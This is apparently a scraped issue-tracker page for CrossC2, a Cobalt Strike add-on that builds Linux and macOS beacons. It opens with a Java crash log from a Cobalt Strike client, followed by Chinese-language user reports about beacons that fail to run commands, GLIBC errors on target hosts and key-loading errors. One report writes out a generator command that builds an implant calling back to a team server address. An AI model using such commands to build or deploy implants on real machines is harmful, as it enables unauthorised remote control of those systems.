class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
}
Event: 3282.890 GC heap before
{Heap before GC invocations=19 (full 19):
PSYoungGen total 2050048K, used 512K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x0000000731280018,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28760K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644816028,0x0000000731200000)
Metaspace used 29753K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
Event: 3282.914 GC heap after
Heap after GC invocations=19 (full 19):
PSYoungGen total 2050048K, used 0K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x0000000731200000,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28770K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644818b10,0x0000000731200000)
Metaspace used 29753K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
}

Deoptimization events (10 events):
Event: 3573.049 Thread 0x000001b57cb43000 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000001b569063df8 method=java.util.Collections$UnmodifiableList.get(I)Ljava/lang/Object; @ 5
Event: 3573.049 Thread 0x000001b57cb43000 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000001b569063df8 method=java.util.Collections$UnmodifiableList.get(I)Ljava/lang/Object; @ 5
Event: 3573.050 Thread 0x000001b57cb43000 Uncommon trap: reason=bimorphic action=maybe_recompile pc=0x000001b569de8e94 method=java.util.Collections$UnmodifiableCollection.size()I @ 4
Event: 3573.050 Thread 0x000001b57cb43000 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000001b569063df8 method=java.util.Collections$UnmodifiableList.get(I)Ljava/lang/Object; @ 5
Event: 3573.050 Thread 0x000001b57cb43000 Uncommon trap: reason=bimorphic action=maybe_recompile pc=0x000001b569de8e94 method=java.util.Collections$UnmodifiableCollection.size()I @ 4
Event: 3573.050 Thread 0x000001b57cb43000 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000001b569063df8 method=java.util.Collections$UnmodifiableList.get(I)Ljava/lang/Object; @ 5
Event: 3573.069 Thread 0x000001b57cb43000 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000001b569503518 method=sun.text.normalizer.Trie.getCodePointOffset(I)I @ 9
Event: 3573.071 Thread 0x000001b57cb43000 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000001b568f142f0 method=java.lang.Character.isHighSurrogate(C)Z @ 3
Event: 3573.071 Thread 0x000001b57cb43000 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000001b5698dbaec method=sun.text.UCompactIntArray.elementAt(I)I @ 14
Event: 3573.071 Thread 0x000001b57cb43000 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000001b5698d9c10 method=sun.text.UCompactIntArray.setElementAt(II)V @ 25

Classes redefined (0 events):
No events

Internal exceptions (10 events):
Event: 10.396 Thread 0x000001b57cd4b000 Exception <a 'java/lang/NoSuchMethodError': > (0x0000000735277ef0) thrown at [C:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u261\295\hotspot\src\share\vm\prims\jni.cpp, line 1615]
Event: 10.399 Thread 0x000001b57cd4b000 Exception <a 'java/lang/NoSuchMethodError': > (0x00000007352b1f30) thrown at [C:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u261\295\hotspot\src\share\vm\prims\jni.cpp, line 1615]
Event: 10.492 Thread 0x000001b57cd4b000 Exception <a 'java/lang/NoSuchMethodError': > (0x0000000735308938) thrown at [C:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u261\295\hotspot\src\share\vm\prims\jni.cpp, line 1615]
Event: 10.574 Thread 0x000001b57cd4b800 Implicit null exception at 0x000001b56949d430 to 0x000001b56949d48c
Event: 10.859 Thread 0x000001b57cd47000 Exception <a 'java/lang/InterruptedException': sleep interrupted> (0x000000073862ef00) thrown at [C:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u261\295\hotspot\src\share\vm\prims\jvm.cpp, line 3298]
Event: 3064.239 Thread 0x000001b57cb43000 Implicit null exception at 0x000001b569d1b922 to 0x000001b569d1bcad
Event: 3235.746 Thread 0x000001b57cb43000 Implicit null exception at 0x000001b569abc750 to 0x000001b569abc796
Event: 3235.746 Thread 0x000001b57cb43000 Implicit null exception at 0x000001b569e99960 to 0x000001b569e9ce61
Event: 3280.426 Thread 0x000001b57cb43000 Implicit null exception at 0x000001b569f68f84 to 0x000001b569f6947d
Event: 3302.705 Thread 0x000001b57cb43000 Implicit null exception at 0x000001b569e62352 to 0x000001b569e63569

Events (10 events):
Event: 3573.073 loading class sun/text/normalizer/UCharacterIterator
Event: 3573.073 loading class sun/text/normalizer/UCharacterIterator done
Event: 3573.073 loading class sun/text/normalizer/ReplaceableUCharacterIterator
Event: 3573.073 loading class sun/text/normalizer/ReplaceableUCharacterIterator done
Event: 3573.073 loading class sun/text/normalizer/ReplaceableString
Event: 3573.073 loading class sun/text/normalizer/Replaceable
Event: 3573.073 loading class sun/text/normalizer/Replaceable done
Event: 3573.073 loading class sun/text/normalizer/ReplaceableString done
Event: 3573.077 loading class de/javasoft/plaf/synthetica/filechooser/SyntheticaFileChooserUI$FilePane$DetailsTableModel$1$1
Event: 3573.077 loading class de/javasoft/plaf/synthetica/filechooser/SyntheticaFileChooserUI$FilePane$DetailsTableModel$1$1 done

Dynamic libraries:
0x00007ff7bcbe0000 - 0x00007ff7bcc27000 C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
0x00007fff73250000 - 0x00007fff7343d000 C:\WINDOWS\SYSTEM32\ntdll.dll
0x00007fff70500000 - 0x00007fff705b3000 C:\WINDOWS\System32\KERNEL32.DLL
0x00007fff6fd60000 - 0x00007fff6fff5000 C:\WINDOWS\System32\KERNELBASE.dll
0x0000000077c80000 - 0x0000000077c96000 C:\Windows\x64\ANSI64.dll
0x00007fff709d0000 - 0x00007fff70a73000 C:\WINDOWS\System32\ADVAPI32.dll
0x00007fff72d90000 - 0x00007fff72e2e000 C:\WINDOWS\System32\msvcrt.dll
0x00007fff72250000 - 0x00007fff722ee000 C:\WINDOWS\System32\sechost.dll
0x00007fff72e30000 - 0x00007fff72f52000 C:\WINDOWS\System32\RPCRT4.dll
0x00007fff72050000 - 0x00007fff721e7000 C:\WINDOWS\System32\USER32.dll
0x00007fff70300000 - 0x00007fff70320000 C:\WINDOWS\System32\win32u.dll
0x00007fff721f0000 - 0x00007fff72219000 C:\WINDOWS\System32\GDI32.dll
0x00007fff70080000 - 0x00007fff70219000 C:\WINDOWS\System32\gdi32full.dll
0x00007fff6fca0000 - 0x00007fff6fd40000 C:\WINDOWS\System32\msvcp_win.dll
0x00007fff70320000 - 0x00007fff7041a000 C:\WINDOWS\System32\ucrtbase.dll
0x00007fff5a700000 - 0x00007fff5a979000 C:\WINDOWS\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1217_none_de6e4304534e0ad3\COMCTL32.dll
0x00007fff72380000 - 0x00007fff726ac000 C:\WINDOWS\System32\combase.dll
0x00007fff70000000 - 0x00007fff7007e000 C:\WINDOWS\System32\bcryptPrimitives.dll
0x00007fff72220000 - 0x00007fff7224e000 C:\WINDOWS\System32\IMM32.DLL
0x00007fff6b7a0000 - 0x00007fff6b7b5000 C:\Program Files\Java\jre1.8.0_261\bin\vcruntime140.dll
0x0000000180000000 - 0x0000000180037000 D:\Program Files\Eisoo AnyShare\winhook64.dll
0x00007fff70470000 - 0x00007fff70478000 C:\WINDOWS\System32\PSAPI.DLL
0x00007fff72350000 - 0x00007fff7236d000 C:\WINDOWS\System32\imagehlp.dll
0x00007fff70a80000 - 0x00007fff71f74000 C:\WINDOWS\System32\SHELL32.dll
0x00007fff70420000 - 0x00007fff7046a000 C:\WINDOWS\System32\cfgmgr32.dll
0x00007fff72b30000 - 0x00007fff72bd8000 C:\WINDOWS\System32\shcore.dll
0x00007fff6f550000 - 0x00007fff6fc9e000 C:\WINDOWS\System32\windows.storage.dll
0x00007fff6f240000 - 0x00007fff6f264000 C:\WINDOWS\System32\profapi.dll
0x00007fff6f290000 - 0x00007fff6f2ed000 C:\WINDOWS\System32\powrprof.dll
0x00007fff722f0000 - 0x00007fff72342000 C:\WINDOWS\System32\shlwapi.dll
0x00007fff6f2f0000 - 0x00007fff6f301000 C:\WINDOWS\System32\kernel.appcore.dll
0x00007fff6fd40000 - 0x00007fff6fd57000 C:\WINDOWS\System32\cryptsp.dll
0x00007fff70740000 - 0x00007fff70895000 C:\WINDOWS\System32\ole32.dll
0x0000000050270000 - 0x0000000050343000 C:\WINDOWS\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9518_none_08e07c8fa840efbe\MSVCP90.dll
0x0000000050350000 - 0x00000000503f3000 C:\WINDOWS\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9518_none_08e07c8fa840efbe\MSVCR90.dll
0x00007fff69e00000 - 0x00007fff69e9b000 C:\Program Files\Java\jre1.8.0_261\bin\msvcp140.dll
0x0000000076880000 - 0x00000000770ec000 C:\Program Files\Java\jre1.8.0_261\bin\server\jvm.dll
0x00007fff5eeb0000 - 0x00007fff5eeb9000 C:\WINDOWS\SYSTEM32\WSOCK32.dll
0x00007fff6b0d0000 - 0x00007fff6b0f4000 C:\WINDOWS\SYSTEM32\WINMM.dll
0x00007fff6dda0000 - 0x00007fff6ddaa000 C:\WINDOWS\SYSTEM32\VERSION.dll
0x00007fff71fe0000 - 0x00007fff7204d000 C:\WINDOWS\System32\WS2_32.dll
0x00007fff6b080000 - 0x00007fff6b0ad000 C:\WINDOWS\SYSTEM32\winmmbase.dll
0x00007fff6b790000 - 0x00007fff6b7a0000 C:\Program Files\Java\jre1.8.0_261\bin\verify.dll
0x00007fff6b760000 - 0x00007fff6b78b000 C:\Program Files\Java\jre1.8.0_261\bin\java.dll
0x00007fff6b740000 - 0x00007fff6b758000 C:\Program Files\Java\jre1.8.0_261\bin\zip.dll
0x00007fff4dc80000 - 0x00007fff4de14000 C:\Program Files\Java\jre1.8.0_261\bin\awt.dll
0x00007fff708a0000 - 0x00007fff70964000 C:\WINDOWS\System32\OLEAUT32.dll
0x00007fff6ccb0000 - 0x00007fff6cd3c000 C:\WINDOWS\SYSTEM32\apphelp.dll
0x00007fff6cda0000 - 0x00007fff6ce3c000 C:\WINDOWS\system32\uxtheme.dll
0x00007fff705d0000 - 0x00007fff7073c000 C:\WINDOWS\System32\MSCTF.dll
0x00007fff6d6a0000 - 0x00007fff6d6ce000 C:\WINDOWS\system32\dwmapi.dll
0x00007fff6f310000 - 0x00007fff6f4ec000 C:\WINDOWS\System32\CRYPT32.dll
0x00007fff6f270000 - 0x00007fff6f282000 C:\WINDOWS\System32\MSASN1.dll
0x00007fff4bac0000 - 0x00007fff4bbe7000 C:\WINDOWS\system32\opengl32.dll
0x00007fff4ee10000 - 0x00007fff4ee3c000 C:\WINDOWS\SYSTEM32\GLU32.dll
0x00007fff69da0000 - 0x00007fff69de9000 C:\Program Files\Java\jre1.8.0_261\bin\fontmanager.dll
0x00007fff6b720000 - 0x00007fff6b73c000 C:\Program Files\Java\jre1.8.0_261\bin\net.dll
0x00007fff41c70000 - 0x00007fff41c90000 C:\WINDOWS\system32\PrxerDrv.dll
0x00007fff6eab0000 - 0x00007fff6eb17000 C:\WINDOWS\system32\mswsock.dll
0x00007fff6b220000 - 0x00007fff6b233000 C:\Program Files\Java\jre1.8.0_261\bin\nio.dll
0x00007fff692f0000 - 0x00007fff69333000 C:\Program Files\Java\jre1.8.0_261\bin\t2k.dll
0x00007fff6b710000 - 0x00007fff6b71d000 C:\Program Files\Java\jre1.8.0_261\bin\management.dll
0x00007fff688e0000 - 0x00007fff68904000 C:\Program Files\Java\jre1.8.0_261\bin\sunec.dll
0x00007fff6e7d0000 - 0x00007fff6e80d000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL
0x00007fff705c0000 - 0x00007fff705c8000 C:\WINDOWS\System32\NSI.dll
0x00007fff68500000 - 0x00007fff68516000 C:\WINDOWS\SYSTEM32\dhcpcsvc6.DLL
0x00007fff684e0000 - 0x00007fff684fc000 C:\WINDOWS\SYSTEM32\dhcpcsvc.DLL
0x00007fff6e810000 - 0x00007fff6e8d7000 C:\WINDOWS\SYSTEM32\DNSAPI.dll
0x00007fff6e630000 - 0x00007fff6e663000 C:\WINDOWS\system32\rsaenh.dll
0x00007fff702d0000 - 0x00007fff702f6000 C:\WINDOWS\System32\bcrypt.dll
0x00007fff6f170000 - 0x00007fff6f198000 C:\WINDOWS\SYSTEM32\USERENV.dll
0x00007fff6ec80000 - 0x00007fff6ec8c000 C:\WINDOWS\SYSTEM32\CRYPTBASE.dll
0x00007fff72f60000 - 0x00007fff73002000 C:\WINDOWS\System32\clbcatq.dll
0x00007fff68f70000 - 0x00007fff69128000 C:\WINDOWS\SYSTEM32\WindowsCodecs.dll
0x00007fff4f1a0000 - 0x00007fff4f1f6000 C:\WINDOWS\system32\dataexchange.dll
0x00007fff6bd30000 - 0x00007fff6bfae000 C:\WINDOWS\system32\d3d11.dll
0x00007fff6c570000 - 0x00007fff6c733000 C:\WINDOWS\system32\dcomp.dll
0x00007fff6df50000 - 0x00007fff6e012000 C:\WINDOWS\system32\dxgi.dll
0x00007fff6d480000 - 0x00007fff6d694000 C:\WINDOWS\system32\twinapi.appcore.dll
0x00007fff6d6d0000 - 0x00007fff6d6f8000 C:\WINDOWS\system32\RMCLIENT.dll
0x00007fff55b60000 - 0x00007fff55bf5000 C:\WINDOWS\System32\TextInputFramework.dll
0x00007fff69a30000 - 0x00007fff69d52000 C:\WINDOWS\System32\CoreUIComponents.dll
0x00007fff6caa0000 - 0x00007fff6cb82000 C:\WINDOWS\System32\CoreMessaging.dll
0x00007fff6e290000 - 0x00007fff6e2c1000 C:\WINDOWS\SYSTEM32\ntmarta.dll
0x00007fff6aac0000 - 0x00007fff6ac13000 C:\WINDOWS\SYSTEM32\wintypes.dll
0x00007fff688b0000 - 0x00007fff688da000 C:\Program Files\Java\jre1.8.0_261\bin\dcpr.dll
0x00007fff6b210000 - 0x00007fff6b21d000 C:\Program Files\Java\jre1.8.0_261\bin\sunmscapi.dll
0x00007fff6ed80000 - 0x00007fff6eda6000 C:\WINDOWS\SYSTEM32\ncrypt.dll
0x00007fff6ed40000 - 0x00007fff6ed7c000 C:\WINDOWS\SYSTEM32\NTASN1.dll
0x00007fff3ae10000 - 0x00007fff3aeb9000 C:\WINDOWS\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.1217_none_6d05fc3859f9e9fa\comctl32.dll
0x00007fff6d9a0000 - 0x00007fff6db49000 C:\WINDOWS\system32\propsys.dll
0x00007fff42310000 - 0x00007fff42437000 C:\WINDOWS\system32\NetworkExplorer.dll
0x00007fff4ba50000 - 0x00007fff4bab1000 C:\Windows\System32\thumbcache.dll
0x00007fff631a0000 - 0x00007fff63377000 C:\WINDOWS\SYSTEM32\urlmon.dll
0x00007fff60a90000 - 0x00007fff60d38000 C:\WINDOWS\SYSTEM32\iertutil.dll
0x00007fff5b640000 - 0x00007fff5b65c000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
0x00007fff65ee0000 - 0x00007fff66620000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
0x00007fff62860000 - 0x00007fff62989000 C:\Windows\System32\Windows.StateRepositoryPS.dll
0x00007fff4ba00000 - 0x00007fff4ba45000 C:\WINDOWS\SYSTEM32\edputil.dll
0x00007fff5a280000 - 0x00007fff5a28c000 C:\WINDOWS\SYSTEM32\Secur32.dll
0x00007fff6f140000 - 0x00007fff6f16f000 C:\WINDOWS\SYSTEM32\SSPICLI.DLL
0x00007fff42f80000 - 0x00007fff42fc1000 C:\WINDOWS\SYSTEM32\MLANG.dll
0x00007fff5e950000 - 0x00007fff5ee31000 C:\WINDOWS\SYSTEM32\WININET.dll
0x00007fff62320000 - 0x00007fff6236b000 C:\Windows\System32\Windows.UI.AppDefaults.dll
0x00007fff6ed10000 - 0x00007fff6ed35000 C:\Windows\System32\Wldp.dll
0x00007fff6f4f0000 - 0x00007fff6f549000 C:\WINDOWS\System32\WINTRUST.dll
0x00007fff699a0000 - 0x00007fff69a28000 C:\WINDOWS\SYSTEM32\policymanager.dll
0x00007fff6ad70000 - 0x00007fff6adfa000 C:\WINDOWS\SYSTEM32\msvcp110_win.dll
0x00007fff60580000 - 0x00007fff6059b000 C:\WINDOWS\SYSTEM32\MPR.dll
0x00007fff687e0000 - 0x00007fff687eb000 C:\WINDOWS\System32\drprov.dll
0x00007fff6e330000 - 0x00007fff6e388000 C:\WINDOWS\System32\WINSTA.dll
0x00007fff62e50000 - 0x00007fff62e65000 C:\WINDOWS\System32\ntlanman.dll
0x00007fff62e30000 - 0x00007fff62e4d000 C:\WINDOWS\System32\davclnt.dll
0x00007fff62e20000 - 0x00007fff62e2c000 C:\WINDOWS\System32\DAVHLPR.dll
0x00007fff6a9b0000 - 0x00007fff6a9c7000 C:\WINDOWS\System32\wkscli.dll
0x00007fff40550000 - 0x00007fff40562000 C:\WINDOWS\SYSTEM32\cscapi.dll
0x00007fff6e8e0000 - 0x00007fff6e8ee000 C:\WINDOWS\System32\netutils.dll
0x00007fff5efd0000 - 0x00007fff5f034000 C:\WINDOWS\SYSTEM32\mscoree.dll
0x00007fff5ef20000 - 0x00007fff5efc9000 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
0x00007fff6f0a0000 - 0x00007fff6f13b000 C:\WINDOWS\SYSTEM32\sxs.dll
0x00007fff5dda0000 - 0x00007fff5e867000 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
0x00007fff5dc70000 - 0x00007fff5dc86000 C:\WINDOWS\SYSTEM32\VCRUNTIME140_CLR0400.dll
0x00007fff5dbb0000 - 0x00007fff5dc6d000 C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
0x00007fff5b6c0000 - 0x00007fff5ccbd000 C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\mscorlib\fe2524177eb3088c77be666722039f52\mscorlib.ni.dll
0x00007fff5a5b0000 - 0x00007fff5a6ff000 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll
0x00007fff58ae0000 - 0x00007fff5974f000 C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\System\e43dd9c73ab5615e461bf5109c3facd6\System.ni.dll
0x00007fff539d0000 - 0x00007fff54445000 C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\System.Core\0d59b0e237d7519417de10cd84bda4e7\System.Core.ni.dll
0x00007fff527d0000 - 0x00007fff52903000 C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\System.Configuration\4beb1eeca20b27d4bd1bb9880f03cc2a\System.Configuration.ni.dll

VM Arguments:
jvm_args: -Dfile.encoding=UTF-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC
java_command: cobaltstrike.jar
java_class_path (initial): cobaltstrike.jar
Launcher Type: SUN_STANDARD

Environment Variables:
PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files (x86)\python3;C:\Program Files (x86)\python3\Scripts;C:\Program Files (x86)\python2;C:\Program Files (x86)\python2\Scripts;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Java\jre1.8.0_191\bin;C:\Program Files\Java\jre1.8.0_191;D:\Program Files\nodejs;D:\Program Files\Eisoo AnyShare;C:\Users\hcl\AppData\Local\Microsoft\WindowsApps;D:\Program Files (x86)\netcat;D:\Burp1.7.26\BurpUnlimited;C:\Program Files\x64;D:\Program Files\wget-1.20.3-win64;D:\Program Files\JetBrains\PyCharm\bin;C:\Windows\x64;C:\Windows\System32\WindowsPowerShell\v1.0;D:\Program Files (x86)\Nmap;C:\Users\hcl\AppData\Roaming\npm
USERNAME=hcl
OS=Windows_NT
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 142 Stepping 10, GenuineIntel

--------------- S Y S T E M ---------------

OS: Windows 10.0 , 64 bit Build 17763 (10.0.17763.1158)

CPU:total 8 (initial active 8) (4 cores per cpu, 2 threads per core) family 6 model 142 stepping 10, cmov, cx8, fxsr, mmx, sse, sse2, sse3, ssse3, sse4.1, sse4.2, popcnt, avx, avx2, aes, clmul, erms, 3dnowpref, lzcnt, ht, tsc, tscinvbit, bmi1, bmi2, adx

Memory: 4k page, physical 12489956k(8212068k free), swap 18519268k(6575096k free)

vm_info: Java HotSpot(TM) 64-Bit Server VM (25.261-b12) for windows-amd64 JRE (1.8.0_261-b12), built on Jun 18 2020 06:56:32 by "" with unknown MS VC++:1916

time: Fri Sep 25 13:00:47 2020
timezone: ?D1ú±ê×?ê±??
elapsed time: 3573 seconds (0d 0h 59m 33s)

发现好慢，并且执行命令都失败了，有遇到的没？

Failed to generate linux bounce

sleep 貌似没起作用

sleep 0 之后貌似还是一分钟

请问windows下gui界面无法生成文件

那请问windows下gui界面无法生成文件，或者是具体怎么配置呢？
1、CrossC2.cna文件配置里面的"genCC2路径为真实路径"是客户端的路径对吧，那windows下CS生成的curl链接在下载的时候报404呢
2、在windows下genCrossC2.Win.exe无法生成文件

windows10下genCrossC2.Win.exe生成报错

请问是什么问题呢。

支持 4.0 吗

请问生成移动端 beacon 的 cna 文件在哪儿？

想测试一下 iOS/Android 的移动端 beacon 上线情况，但是在 release V2.1 版本中的 cna 文件只有生成 Linux/macOS/linux-bind/macOS-bind 四种选项，请问移动端测试的脚本文件在哪里呢？感谢！

异常报错

本地kali下生成的文件，文件名为:inits ,目标环境为Centos6.2，团队服务器为Ubuntu，在目标服务器上执行后出现以下报错：

./inits: /lib64/libc.so.6: version GLIBC_2.15' not found (required by ./inits) ./inits: /lib64/libc.so.6: version GLIBC_2.14' not found (required by ./inits)
./inits: /lib64/libc.so.6: version `GLIBC_2.17' not found (required by ./inits)

必须有对应的GLIBC版本环境才可以吗？且生成的文件太大了，近2MB

uname -a
Linux www2 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64 x86_64 x86_64 GNU/Linux

Linux Beacon crash & Linux genCrossC2

Linux Beacon在测试时发现崩溃退出，发现不同环境的Linux free机制不同，后续将修复该问题。
Linux版本genCrossC2文件将在bug修复后同时推送。

生成的时候报错了为啥

./genCrossC2.Linux 192.168.106.156 443 null null Linux x86 ./cross-test

read keys error
Exception in thread "main" java.lang.NoClassDefFoundError: common/CommonUtils
at genKey.BeaconKey.main(BeaconKey.java:52)
Caused by: java.lang.ClassNotFoundException: common.CommonUtils
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:521)
... 1 more
*[error] : read key error

genCrossC2.MacOS 执行中报错

已经把server下的key复制到了本地目录，并给与了执行权限，还是在运行时候报了个错

报错内容：
Exception in thread "main" java.lang.NoClassDefFoundError: common/CommonUtils
at genKey.BeaconKey.main(BeaconKey.java:52)
Caused by: java.lang.ClassNotFoundException: common.CommonUtils
at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
... 1 more
*[error] : read key error

为什么使用cs4.1能上线但是无法执行命令呢？

大佬好：
下载的cross2的2.1版本，在cs4.1下能上线，但是没法执行命令，这是怎么回事呢？请指教。

而且上线的internal地址很奇怪：

在靶机执行出现的报错。

./CrossC2-test: /lib64/libc.so.6: version GLIBC_2.15' not found (required by ./CrossC2-test) ./CrossC2-test: /lib64/libc.so.6: version GLIBC_2.14' not found (required by ./CrossC2-test)
./CrossC2-test: /lib64/libc.so.6: version GLIBC_2.7' not found (required by ./CrossC2-test) ./CrossC2-test: /lib64/libc.so.6: version GLIBC_2.17' not found (required by ./CrossC2-test)

运行报错
./genCrossC2.Linux: /lib64/libc.so.6: version `GLIBC_2.25' not found (required by ./genCrossC2.Linux)

cs 自定义profile

好像是不支持自定义的profile cs，使用自定义的ssl 证书不上

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.